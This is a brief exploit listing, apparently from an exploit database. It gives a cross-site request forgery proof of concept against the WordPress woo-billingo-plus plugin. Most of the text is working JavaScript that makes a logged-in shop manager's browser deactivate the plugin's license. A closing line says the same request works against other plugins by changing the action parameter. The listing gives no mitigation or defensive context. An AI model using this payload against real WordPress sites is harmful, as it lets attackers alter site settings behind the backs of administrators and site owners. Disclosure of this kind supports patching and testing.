Share
## https://sploitus.com/exploit?id=WPEX-ID:CDA978B2-B31F-495D-8601-0AAA3E4B45CD
With the woo-billingo-plus plugin installed, make a logged in user with the edit_shop_orders capability open a page containing the below JS code

fetch('https://example.com/wp-admin/admin-ajax.php', { 
method: 'POST', 
headers: new Headers({ 
'Content-Type': 'application/x-www-form-urlencoded', 
}), 
body: 'action=wc_billingo_plus_license_deactivate', 
redirect: 'follow' 
}).then(response => response.text()).then(result => 
console.log(result)).catch(error => console.log('error', error));

For other plugins, juts change the action parameter accordingly